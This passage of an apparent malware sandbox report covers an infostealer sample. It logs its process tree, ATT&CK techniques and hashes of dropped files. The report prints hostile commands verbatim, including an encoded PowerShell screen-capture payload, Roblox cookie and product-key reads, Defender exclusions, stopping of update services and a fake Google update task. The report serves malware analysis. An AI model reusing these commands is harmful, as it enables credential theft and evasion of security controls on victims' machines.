AgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        9⤵
        
        PID:4868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rmotxtqt\rmotxtqt.cmdline"
        11⤵
        
        PID:7584
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA671.tmp" "c:\Users\Admin\AppData\Local\Temp\rmotxtqt\CSCE7487CBCB43C44F6B0DC4A49E2B96E7E.TMP"
        12⤵
        
        PID:7860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:5636
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:7236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:7380
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:7516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:7540
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:7668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:7688
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:7920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:7944
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:8012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        9⤵
        
        PID:8520
        
        C:\Windows\system32\getmac.exe
        
        getmac
        10⤵
        
        PID:8616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        9⤵
        
        PID:6668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        9⤵
        
        PID:8964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:9028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26762\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\oQ8cY.zip" *"
        9⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\_MEI26762\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI26762\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\oQ8cY.zip" *
        10⤵
        Executes dropped EXE
        
        PID:6184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        9⤵
        
        PID:6484
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        9⤵
        
        PID:5756
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        10⤵
        
        PID:6552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        9⤵
        
        PID:6736
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        10⤵
        
        PID:7012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        9⤵
        
        PID:7128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        9⤵
        
        PID:7412
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:7456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        9⤵
        
        PID:4724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7020
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6436
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5688
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7480
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1876
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5000
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:7428
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:7816
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:7868
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:7724
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6184
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4444
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:11204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:11212
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:10332
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:10412
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:10512
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:10732
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:10792
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:11108
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:12028
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:12600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3672

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3864

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4052

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4120

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4376

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3144

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4508

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3984

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4732

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5520

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:7732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:12544
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 488 -p 1020 -ip 1020
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:10872

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:12932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\based.exe

Filesize
6.9MB

MD5
a71fc3ca1bd1af148ee4c1bfabcbe0da

SHA1
bbaf078956d577d05ab1cac41cc530c1e780478d

SHA256
4f9f2637c579b3c01c0031926bd29d3774d4d9435d70e8c7c2d17aeba81e2441

SHA512
ee4ee30004404a10da6eb1c468df1f905bd20ed4b9139e477563eb998243764f7a54d20e7980b029a3b28d4774b695b8eb21d143c1cdb6fd7401cc001c863f35

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
b9f3e6e06f33ee7078f514d41be5faad

SHA1
e2d35bc333ec6ff0f6ae60e55daca44a433fc279

SHA256
a7c3208cf3067d1da12542cab16516c9085620959deb60dd000e190f15c74758

SHA512
212a6540082a20de6798d53e2c6f7f5705e5e4164620aa7f08a366e747f240c59c4c70ce0b8dd00625a0a960d1615073b4e48b2707abe767b422f732c5927bed

Download Submit
C:\ProgramData\main.exe

Filesize
5.6MB

MD5
5df3e2c717f267899f37ec6e8fc7f47a

SHA1
5e980079f67215bf69b8c1c16b56f40bf4a29958

SHA256
e3f5c557ece7ec27cb7e4a26482eadf0d9065065d94b2919f9b881bc74800e6e

SHA512
8cef1184120e010421d69fcf271822b3f0b45e34a1565152a3f2decb8f500d0e69de9816d9075683fcfb0f431713f3fbc42ac2d87503cdcdde125aba3fa1635d

Download Submit
C:\ProgramData\setup.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\svchost.exe

Filesize
12.0MB

MD5
48b277a9ac4e729f9262dd9f7055c422

SHA1
d7e8a3fa664e863243c967520897e692e67c5725

SHA256
5c832eda59809a4f51dc779bb00bd964aad42f2597a1c9f935cfb37f0888ef17

SHA512
66dd4d1a82103cd90c113df21eb693a2bffde2cde41f9f40b5b85368d5a920b66c3bc5cadaf9f9d74dfd0f499086bedd477f593184a7f755b7b210ef5e428941

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_queue.pyd

Filesize
30KB

MD5
ff8300999335c939fcce94f2e7f039c0

SHA1
4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a

SHA256
2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78

SHA512
f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_socket.pyd

Filesize
76KB

MD5
8140bdc5803a4893509f0e39b67158ce

SHA1
653cc1c82ba6240b0186623724aec3287e9bc232

SHA256
39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769

SHA512
d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\certifi\cacert.pem

Filesize
285KB

MD5
d3e74c9d33719c8ab162baa4ae743b27

SHA1
ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b

SHA256
7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92

SHA512
e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\charset_normalizer\md.cp311-win_amd64.pyd

Filesize
10KB

MD5
723ec2e1404ae1047c3ef860b9840c29

SHA1
8fc869b92863fb6d2758019dd01edbef2a9a100a

SHA256
790a11aa270523c2efa6021ce4f994c3c5a67e8eaaaf02074d5308420b68bd94

SHA512
2e323ae5b816adde7aaa14398f1fdb3efe15a19df3735a604a7db6cadc22b753046eab242e0f1fbcd3310a8fbb59ff49865827d242baf21f44fd994c3ac9a878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35482\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35482\_ctypes.pyd

Filesize
120KB

MD5
6a9ca97c039d9bbb7abf40b53c851198

SHA1
01bcbd134a76ccd4f3badb5f4056abedcff60734

SHA256
e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535

SHA512
